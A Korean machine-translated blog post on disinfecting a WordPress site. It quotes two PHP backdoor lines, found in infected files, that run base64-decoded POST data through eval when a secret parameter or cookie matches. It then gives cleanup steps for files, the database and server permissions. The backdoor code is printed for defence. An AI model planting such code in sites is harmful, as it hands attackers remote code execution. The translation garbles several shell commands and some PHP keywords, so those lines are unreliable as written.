WordPress 악용 - 바이러스 파일, SQL 및 서버 보안을 정리합니다.

당신이이 포스트를 읽기 전에, 당신은 볼 수 여기에 게시뭔가를 이해합니다. :)

여러 블로그 파일에서 찾았습니다. stealthsettings.com, 아래 코드와 유사한 코드로 바이러스의 결과로 의 위업 WordPress.:

<?php if($_GET[‘573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST[‘file'])); 출구; }?>

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); 출구; }?>

XMLRPC위의 파일에 대한 경우 xmlrpc.php 부터 졸리는,에서 GREP 서버는 소스 코드에서 이런 종류의 꽤 많은 것 같습니다.

감염된 파일 청소 :

Ooookkkk ...
1. 가장 좋은 방법은 그것을 수행되는 백업그리고 청소 데이터베이스에 있습니다 닦음 파일 WordPress (주의 깊게 확인한 후 wp-config.php 및 wp 플랫폼과 엄격하게 관련되지 않은 파일을 보관할 수 있음) 서버에서 원본 파일을 버전에서 업로드 2.5.1 (이 경우에 및 버전 업그레이드 WP :을) http://wordpress.org/download/ . 당신이 그들의주의 검사가 신뢰하지 않는 경우 테마 파일을 포함하여 닦으십시오.

그것은 영향을받은 것 같고, 블로그에 전에 사용하고 간단하게 테마를 변​​경하지 않은 테마 파일이 문제가 해결되지 않습니다.

./andrea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); 출구; }?>

2. 검색하고 포함 된 모든 파일을 삭제합니다... * _new.php * _old.php * Jpgg * 기후 * Pngg 및 WP-info.txt 파일 (있는 경우)를.

찾기. -이름“* _new.php”
찾기. -이름“* _old.php”
찾기. -이름 "* .jpgg"
찾기. -이름“* _giff”
찾기. -이름“* _pngg”
찾기. -이름 "wp-info.txt"

3. 에 / TMP , 검색과 같은 폴더를 삭제 tmpYwbzT2

SQL 청소 :

1. 표 표 wp_options 확인하고 줄을 삭제 : internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. wp_의 모든 것options, 이동 active_plugins 확장 * _new.php * _old.php, *. jpgg *. 기후, *. pngg 또는 다른 확장이 의심되는 경우, 신중하게 확인 중 하나의 끝 플러그인이있는 경우 및 삭제합니다.

3. 표 wp_users그의 오른쪽에 아무것도 작성하지 않은 사용자, 열이있을 경우, 참조 user_nicename. 이 사용자를 삭제하되 ID 열의 번호를 기억하십시오. 이 사용자는 "WordPress"카 user_login 생성 00에 나타납니다 : 00 : 00 0000-00-00.

4. 테이블로 이동 wp_usermeta 이상 ID를 속하는 모든 행을 삭제합니다.

이 SQL 정리를 완료 한 후 플러그인을 비활성화 한 다음 활성화합니다. (블로그-> 대시 보드-> 플러그인)

보안 서버 :

1. "디렉토리와 파일이 무엇인지 확인쓰기"(chmod를 777) 그들에 넣어보십시오 chmod를 모든 수준에서 자신의 글을 허용하지 것. (chmod를 644, 예를 들면)

찾을 수 있습니다. - 파마 - 2-LS

2. 파일이 비트가 설정되어 확인할 SUID 또는 SGID . 당신이 사용하지 않는 경우 해당 파일은 그들에 넣어 chmod를 0 또는 포함 된 패키지를 제거합니다. 그들이 권한을 실행하기 때문에 그들은 "매우 위험하다그룹"또는"뿌리"일반 사용자 권한으로 해당 파일을 실행할 수는 없습니다.

F-파마 - 04000-LS / 유형을 찾을 수
F-파마 - 02000-LS / 유형을 찾을 수

3. 포트가 열려 무엇인지 확인하고, 사용하지 않는 이들을 닫거나 확보하려고합니다.

NETSTAT-| 그렙-i를 들어

너무 많은. 나는하십시오 일부 블로그는 금지된다 구글 검색 및 기타 "그들이 잘 했어!"라고. 뿐만 아니라 당신이 그것을했을 ...하지만 구글은 금지하기 시작하면 당신은 알고있다 모든 사이트 형성  SPAM는 와 (트로이 목마를 넣어Trojan.Clicker.HTML) 쿠키에서?

Stealth: 기술에 대한 열정, 저는 운영 체제에 대한 튜토리얼을 테스트하고 작성하는 것을 좋아합니다. macOS, Linux, Windows, 에 대한 WordPress, WooCommerce 및 LEMP 웹 서버 구성(Linux, NGINX, MySQL 및 PHP). 나는 에 쓴다 StealthSettings2006 년부터 .com을 시작했고 몇 년 후 iHowTo에 글을 쓰기 시작했습니다. 생태계의 장치에 대한 팁 튜토리얼 및 뉴스 Apple: iPhone, iPad, Apple 시계, HomePod, iMac, MacBook, AirPods 및 액세서리.
새로운 기능